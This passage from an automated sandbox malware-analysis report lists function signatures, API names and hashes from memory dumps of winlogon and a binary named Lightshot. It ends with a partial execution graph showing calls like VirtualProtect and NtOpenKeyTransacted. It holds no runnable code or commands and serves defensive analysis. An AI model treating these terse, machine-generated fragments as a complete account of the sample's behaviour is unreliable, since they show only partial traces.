                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: cd1afe50f7e6de5fdb75e3b85d99f54b8b5774328d87a634973043da6fa4d35a
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: 061159312212C6C2FA69A721D5953BDF2426F887F4F141736AC3F876EADE6884018A00
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 60db19895ce507a708008e45d9c0298ffec254aa5bc9d4092071c0d004566a38
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 28011731320AC1C2EB64DB52E89879DB3A6FB88BC4F884036DE5E53755DE38C989C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 18b328c97b5f9e14fffcfa9212a447ac2abda381c2e5647efa8e85a057c85cab
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 19011775321BC0C6EB259B62E84879DB2A1BF49B86F04443ACD4E07B65EF3DC1488B00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: c300b2b6b54622bad3c43c23df103e30e38a6bb1438ec9a2dd89e032c6842fde
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 53518932729683CAEB54CB15E848B9DB7A6FB44B88F508536DE4B47788DF39C841CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: d0bcd0cf9b4692289a878d77c8ac4738952449dce6fe18ad4e1a7071ab5e44cd
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: D4F03C723246C1D2EB609B61F9C479DB761FB88BC8F844032DE4D46954DE2CC68DCB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: e6b40846573bec2309256a1e3779184d66e370f070609bbf47c065b346f7c57b
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: A2F06271221685D1FB108F29E84539DB321EF857A1F54062ADE6E452E4CF2CC045C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 177804a8e33fc8a1ffb9e6d06ac6c2892e3a9ed2a31dc03627c06d5a34e3f628
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A4F0F874624BC5D2EA148F53F9551ADB662AF48FD0F489132EE4E47B18DE2CC4858700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: dcdd8cd598e05c42887886c746ddf0c279423bf44c0c1bf9e557dc900a05699c
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 2A416072625A80C6EB209F65E4443EDF7A2FB98794F514032EE4E87794EF38C441C740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: 449c3b8d4a9707330a2244a19cbde2a29dd6a88ab94e040f38e9f4c0bfe6f638
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 5F110A36224B8182EB618F25F44439DB7E5FB88B94F584226EE8D47B69DF3CC551CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 0e26cef9ba68d931c57e211af9cd086a3cc8b9350f618ba4ce6d2e1c4988f689
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 2AE08671650B84D4DF018F21E8802DC73A4EF58B64B8891339D5C06311FE38D1E9C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: b226c5ef1287e80dd1a639188cd00b7be9ee93c87761d6bca3fa593d7edb1d27
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 32E04F61660B84D0DB058F22E8412D873A09F58B64F8891229D5C06311EE38D1E9C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284708688.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e8589b0000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: ebbb92f6b71bc6aeecd0247755a998ea3fb1c1d57f03a5a9e81a6553625eb14e
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: FDE08C71A20B88C4DF028F21E8802DCB3A4EF68B68F889133CE4C06311EE38D1E9C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750

                                                                          Execution Graph

                                                                          Execution Coverage: 5%
                                                                          Dynamic/Decrypted Code Coverage: 0%
                                                                          Signature Coverage: 0%
                                                                          Total number of Nodes: 172
                                                                          Total number of Limit Nodes: 3
                                                                          execution_graph 1342 7ff7b1c8146d 1343 7ff7b1c81394 2 API calls 1342->1343 1197 7ff7b1c865ec 1198 7ff7b1c865f9 1197->1198 1199 7ff7b1c866e6 wcslen 1197->1199 1198->1199 1246 7ff7b1c8153f 1199->1246 1250 7ff7b1c81394 1246->1250 1248 7ff7b1c8154e 1249 7ff7b1c81394 2 API calls 1248->1249 1251 7ff7b1c89a50 malloc 1250->1251 1252 7ff7b1c813b8 1251->1252 1253 7ff7b1c813c6 NtOpenKeyTransacted 1252->1253 1253->1248 1305 7ff7b1c81ab3 1306 7ff7b1c8199e 1305->1306 1306->1305 1307 7ff7b1c81b36 1306->1307 1308 7ff7b1c81a0f 1306->1308 1310 7ff7b1c819e9 VirtualProtect 1306->1310 1309 7ff7b1c81ba0 4 API calls 1307->1309 1309->1308 1310->1306 1346 7ff7b1c81a70 1348 7ff7b1c8199e 1346->1348 1347 7ff7b1c819e9 VirtualProtect 1347->1346 1347->1348 1348->1346 1348->1347 1349 7ff7b1c81b36 1348->1349 1351 7ff7b1c81a0f 1348->1351 1350 7ff7b1c81ba0 4 API calls 1349->1350 1350->1351 1352 7ff7b1c8216f 1353 7ff7b1c82178 InitializeCriticalSection 1352->1353 1354 7ff7b1c82185 1352->1354 1353->1354 1311 7ff7b1c8219e 1312 7ff7b1c821ab EnterCriticalSection 1311->1312 1313 7ff7b1c82272 1311->1313 1314 7ff7b1c82265 LeaveCriticalSection 1312->1314 1316 7ff7b1c821c8 1312->1316 1314->1313 1315 7ff7b1c821e9 TlsGetValue GetLastError 1315->1316 1316->1314 1316->1315 1154 7ff7b1c811d8 1155 7ff7b1c811fa 1154->1155 1156 7ff7b1c8121a 1155->1156 1157 7ff7b1c81201 _initterm 1155->1157 1167 7ff7b1c81880 1156->1167 1157->1156 1159 7ff7b1c81247 SetUnhandledExceptionFilter 1160 7ff7b1c8126a 1159->1160 1161 7ff7b1c8126f malloc 1160->1161 1162 7ff7b1c8128b 1161->1162 1163 7ff7b1c812a0 strlen malloc memcpy 1162->1163 1163->1163 1164 7ff7b1c812d0 1163->1164 1165 7ff7b1c8132d _cexit 1164->1165 1166 7ff7b1c81338 1164->1166 1165->1166 1168 7ff7b1c818a2 1167->1168 1173 7ff7b1c81a0f 1167->1173 1169 7ff7b1c81956 1168->1169 1172 7ff7b1c8199e 1168->1172 1168->1173 1169->1172 1177 7ff7b1c81ba0 1169->1177 1171 7ff7b1c819e9 VirtualProtect 1171->1172 
1172->1171 1172->1173 1174 7ff7b1c81b36 1172->1174 1173->1159 1175 7ff7b1c81ba0 4 API calls 1174->1175 1176 7ff7b1c81b53 1175->1176 1176->1173 1179 7ff7b1c81bc2 1177->1179 1180 7ff7b1c81c45 VirtualQuery 1179->1180 1181 7ff7b1c81cf4 1179->1181 1184 7ff7b1c81c04 memcpy 1179->1184 1180->1181 1186 7ff7b1c81c72 1180->1186 1182 7ff7b1c81d23 GetLastError 1181->1182 1183 7ff7b1c81d37 1182->1183 1184->1169 1185 7ff7b1c81ca4 VirtualProtect 1185->1182 1185->1184 1186->1184 1186->1185 1355 7ff7b1c81e65 1356 7ff7b1c81e67 signal 1355->1356 1357 7ff7b1c81e7c 1356->1357 1359 7ff7b1c81e99 1356->1359 1358 7ff7b1c81e82 signal 1357->1358 1357->1359 1358->1359 1260 7ff7b1c815e4 1261 7ff7b1c81394 2 API calls 1260->1261 1262 7ff7b1c815f3 1261->1262 1263 7ff7b1c838e0 wcslen 1271 7ff7b1c8157b 1263->1271 1272 7ff7b1c81394 2 API calls 1271->1272 1383 7ff7b1c82320 strlen 1384 7ff7b1c82337 1383->1384 1360 7ff7b1c8118b 1361 7ff7b1c811b9 _amsg_exit 1360->1361 1362 7ff7b1c81190 1360->1362 1365 7ff7b1c811fa 1361->1365 1362->1361 1364 7ff7b1c811a0 Sleep 1362->1364 1364->1361 1364->1362 1366 7ff7b1c8121a 1365->1366 1367 7ff7b1c81201 _initterm 1365->1367 1368 7ff7b1c81880 5 API calls 1366->1368 1367->1366 1369 7ff7b1c81247 SetUnhandledExceptionFilter 1368->1369 1370 7ff7b1c8126a 1369->1370 1371 7ff7b1c8126f malloc 1370->1371 1372 7ff7b1c8128b 1371->1372 1373 7ff7b1c812a0 strlen malloc memcpy 1372->1373 1373->1373 1374 7ff7b1c812d0 1373->1374 1375 7ff7b1c8132d _cexit 1374->1375 1376 7ff7b1c81338 1374->1376 1375->1376 1385 7ff7b1c81f47 1386 7ff7b1c81e67 signal 1385->1386 1389 7ff7b1c81e99 1385->1389 1387 7ff7b1c81e7c 1386->1387 1386->1389 1388 7ff7b1c81e82 signal 1387->1388 1387->1389 1388->1389 1187 7ff7b1c81394 1191 7ff7b1c89a50 1187->1191 1189 7ff7b1c813b8 1190 7ff7b1c813c6 NtOpenKeyTransacted 1189->1190 1192 7ff7b1c89a6e 1191->1192 1194 7ff7b1c89a9b 1191->1194 1192->1189 1193 7ff7b1c89b5f malloc 1196 7ff7b1c89b80 1193->1196 1194->1192 1195 7ff7b1c89b43 1194->1195 1195->1193 1196->1192 1390 
7ff7b1c83352 1391 7ff7b1c833b7 1390->1391 1392 7ff7b1c83579 1391->1392 1395 7ff7b1c83493 wcscpy wcscat wcslen 1391->1395 1405 7ff7b1c8145e 1391->1405 1393 7ff7b1c8362b wcscpy wcscat wcslen 1392->1393 1394 7ff7b1c81422 2 API calls 1393->1394 1397 7ff7b1c83728 1394->1397 1403 7ff7b1c81422 1395->1403 1398 7ff7b1c83767 1397->1398 1407 7ff7b1c81431 1397->1407 1404 7ff7b1c81394 2 API calls 1403->1404 1406 7ff7b1c81394 2 API calls 1405->1406 1408 7ff7b1c81394 2 API calls 1407->1408 1273 7ff7b1c81e10 1274 7ff7b1c81e2f 1273->1274 1275 7ff7b1c81eb5 1274->1275 1276 7ff7b1c81ecc 1274->1276 1279 7ff7b1c81e55 1274->1279 1276->1275 1277 7ff7b1c81ed3 signal 1276->1277 1277->1275 1278 7ff7b1c81ee4 1277->1278 1278->1275 1280 7ff7b1c81eea signal 1278->1280 1279->1275 1281 7ff7b1c81f12 signal 1279->1281 1280->1275 1281->1275 1325 7ff7b1c81fd0 1326 7ff7b1c82033 1325->1326 1327 7ff7b1c81fe4 1325->1327 1327->1326 1328 7ff7b1c81ffd EnterCriticalSection LeaveCriticalSection 1327->1328 1328->1326 1409 7ff7b1c82050 1410 7ff7b1c8205e EnterCriticalSection 1409->1410 1411 7ff7b1c820cf 1409->1411 1412 7ff7b1c820c2 LeaveCriticalSection 1410->1412 1413 7ff7b1c82079 1410->1413 1412->1411 1413->1412 1414 7ff7b1c8653c 1417 7ff7b1c82df0 1414->1417 1418 7ff7b1c82e00 1417->1418 1427 7ff7b1c82690 1418->1427 1462 7ff7b1c8155d 1427->1462 1463 7ff7b1c81394 2 API calls 1462->1463 1282 7ff7b1c82104 1283 7ff7b1c82218 1282->1283 1284 7ff7b1c82111 EnterCriticalSection 1282->1284 1285 7ff7b1c82272 1283->1285 1287 7ff7b1c82241 DeleteCriticalSection 1283->1287 1286 7ff7b1c8220b LeaveCriticalSection 1284->1286 1289 7ff7b1c8212e 1284->1289 1286->1283 1287->1285 1288 7ff7b1c8214d TlsGetValue GetLastError 1288->1289 1289->1286 1289->1288 1290 7ff7b1c81404 1291 7ff7b1c81394 2 API calls 1290->1291 1292 7ff7b1c81413 1291->1292 1293 7ff7b1c81394 2 API calls 1292->1293 1336 7ff7b1c81ac3 1337 7ff7b1c8199e 1336->1337 1338 7ff7b1c81b36 1337->1338 1340 7ff7b1c819e9 VirtualProtect 1337->1340 1341 7ff7b1c81a0f 1337->1341 1339 
7ff7b1c81ba0 4 API calls 1338->1339 1339->1341 1340->1337 1294 7ff7b1c81800 1295 7ff7b1c81812 1294->1295 1296 7ff7b1c81835 fprintf 1295->1296 1297 7ff7b1c81000 1298 7ff7b1c8108b __set_app_type 1297->1298 1299 7ff7b1c81040 1297->1299 1300 7ff7b1c810b6 1298->1300 1299->1298 1301 7ff7b1c810e5 1300->1301 1303 7ff7b1c81e00 1300->1303 1304 7ff7b1c89fe0 __setusermatherr 1303->1304

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 2643109117-1582277970
                                                                          • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction ID: 86f72bd26dee884ad71cbfd2be8e5f4203c41a7077a107d9fa421aa0f3e29c57
                                                                          • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction Fuzzy Hash: EA413071A1960689E700BB1DE59C379A391AF67789FE45031CB0D43BAEDFACA441C330

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtOpenKeyTransacted.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1C81156), ref: 00007FF7B1C813F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000024.00000002.2106685072.00007FF7B1C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7B1C80000, based on PE: true
                                                                          • Associated: 00000024.00000002.2106629889.00007FF7B1C80000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106758888.00007FF7B1C8B000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2106845999.00007FF7B1C8E000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107597270.00007FF7B1F42000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000024.00000002.2107669171.00007FF7B1F45000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_36_2_7ff7b1c80000_Lightshot.jbxd
                                                                          Similarity
                                                                          • API ID: OpenTransacted
                                                                          • String ID:
                                                                          • API String ID: 1720269262-0
                                                                          • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                          • Instruction ID: f8fe3cc99da106a6e6dcc5344837f804fc241000b837bb771f6b178bfa1eebfe
                                                                          • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                          • Instruction Fuzzy Hash: B7F0C971908B4182D710EB59F88D03AB760FBAA388B605C35EA8D47B29CF7CE051DB60

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 42 7ff7b1c865ec-7ff7b1c865f3 43 7ff7b1c865f9-7ff7b1c866df 42->43 44 7ff7b1c866e6-7ff7b1c86784 wcslen call 7ff7b1c8153f call 7ff7b1c8145e 42->44 43->44 49 7ff7b1c8680e-7ff7b1c86822 44->49 50 7ff7b1c8678a-7ff7b1c86791 44->50 53 7ff7b1c8686b-7ff7b1c8688d wcslen 49->53 54 7ff7b1c86824-7ff7b1c86864 49->54 50->49 52 7ff7b1c86793-7ff7b1c86804 call 7ff7b1c82f70 call 7ff7b1c839b0 call 7ff7b1c814c7 50->52 52->49 67 7ff7b1c86806-7ff7b1c86809 call 7ff7b1c8145e 52->67 58 7ff7b1c86890-7ff7b1c868a0 53->58 54->53 64 7ff7b1c869ac 58->64 65 7ff7b1c868a6-7ff7b1c868ba wcslen 58->65 66 7ff7b1c869b0-7ff7b1c869c4 64->66 65->58 68 7ff7b1c868bc 65->68 71 7ff7b1c86a29-7ff7b1c86ae1 wcscpy wcscat call 7ff7b1c82f70 call 7ff7b1c83350 call 7ff7b1c814c7 66->71 72 7ff7b1c869c6-7ff7b1c86a22 66->72 67->49 68->66 81 7ff7b1c86ae7-7ff7b1c86aee 71->81 82 7ff7b1c87ec4-7ff7b1c87f06 call 7ff7b1c81370 71->82 72->71 84 7ff7b1c86b37-7ff7b1c86b47 wcslen 81->84 85 7ff7b1c86af0-7ff7b1c86b30 81->85 82->85 91 7ff7b1c87f0c 82->91 86 7ff7b1c86b89-7ff7b1c86b8b 84->86 87 7ff7b1c86b49-7ff7b1c86b55 84->87 85->84 90 7ff7b1c86b91-7ff7b1c86bbb wcscat 86->90 89 7ff7b1c86b60-7ff7b1c86b70 87->89 94 7ff7b1c86b8d 89->94 95 7ff7b1c86b72-7ff7b1c86b85 wcslen 89->95 96 7ff7b1c87f11-7ff7b1c87f53 call 7ff7b1c81370 90->96 97 7ff7b1c86bc1-7ff7b1c86bc8 90->97 91->84 94->90 95->89 99 7ff7b1c86b87 95->99 100 7ff7b1c86bca-7ff7b1c86c0a 96->100 107 7ff7b1c87f59 96->107 97->100 101 7ff7b1c86c11-7ff7b1c86c40 wcscpy wcscat 97->101 99->90 100->101 103 7ff7b1c87f5e-7ff7b1c87f84 call 7ff7b1c89840 call 7ff7b1c81370 101->103 104 7ff7b1c86c46-7ff7b1c86c4d 101->104 106 7ff7b1c86c53-7ff7b1c86cfd 103->106 122 7ff7b1c87f8a 103->122 105 7ff7b1c86d04-7ff7b1c86d0b 104->105 104->106 109 7ff7b1c86d11-7ff7b1c86d18 105->109 110 7ff7b1c87f8f-7ff7b1c87fd3 call 7ff7b1c81370 105->110 106->105 107->101 112 7ff7b1c86d1a-7ff7b1c86d6f 109->112 113 7ff7b1c86d76-7ff7b1c86d7d 
109->113 110->112 123 7ff7b1c87fd9 110->123 112->113 116 7ff7b1c87fde-7ff7b1c88018 memcpy call 7ff7b1c81370 113->116 117 7ff7b1c86d83-7ff7b1c86d8a 113->117 121 7ff7b1c86d90-7ff7b1c86dac 116->121 128 7ff7b1c8801e 116->128 120 7ff7b1c86eed-7ff7b1c86f8b wcslen call 7ff7b1c8153f call 7ff7b1c8145e 117->120 117->121 133 7ff7b1c87021-7ff7b1c87049 call 7ff7b1c8145e 120->133 134 7ff7b1c86f91-7ff7b1c86f98 120->134 125 7ff7b1c86db0-7ff7b1c86e08 121->125 122->105 123->113 125->125 129 7ff7b1c86e0a-7ff7b1c86ee6 125->129 128->120 129->120 134->133 136 7ff7b1c86f9e-7ff7b1c87017 call 7ff7b1c82f70 call 7ff7b1c839b0 call 7ff7b1c814c7 134->136 136->133 144 7ff7b1c87019-7ff7b1c8701c call 7ff7b1c8145e 136->144 144->133
                                                                          APIs
                                                                          Strings
